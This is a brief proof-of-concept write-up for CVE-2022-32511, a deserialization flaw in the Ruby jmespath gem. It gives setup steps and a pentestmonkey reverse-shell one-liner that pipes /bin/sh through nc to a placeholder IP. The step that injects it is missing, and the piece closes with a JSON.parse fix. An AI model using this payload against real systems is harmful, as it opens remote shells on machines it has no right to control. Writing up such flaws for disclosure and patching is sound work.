CVE-2022–32511 | Exploit | Remote Code Execution

Description:

Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to the usage of JSON.load, which is considered unsafe when used with untrusted input.

Proof-of-concept

1. In order to reproduce the steps we first require to install ‘JMESPath 1.6.0’ or before:

2. To import the library fire ‘Interactive Ruby Shell’ with the following mentioned command:

irb 

3. In case if you don’t have ‘irb’ installed than use the following command to download the same:

gem install irb

4. Pick a desired payload, I have picked one from pentestmonkey

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 'IP' 1234 >/tmp/f

5. Finally, import the vulnerable ‘JMESPath’ library and supply the payload to execute the reverse shell:

Conclusion

It is recommended to use JSON.parse instead of JSON.load.In this case we observed that the JSON.load has failed to validate the input data which leads to Remote Code Execution.

Reference

NVD

Deserialization of Untrusted Data in jmespath | CVE-2022-32511 | Snyk

Comparing v1.6.0...v1.6.1 · jmespath/jmespath.rb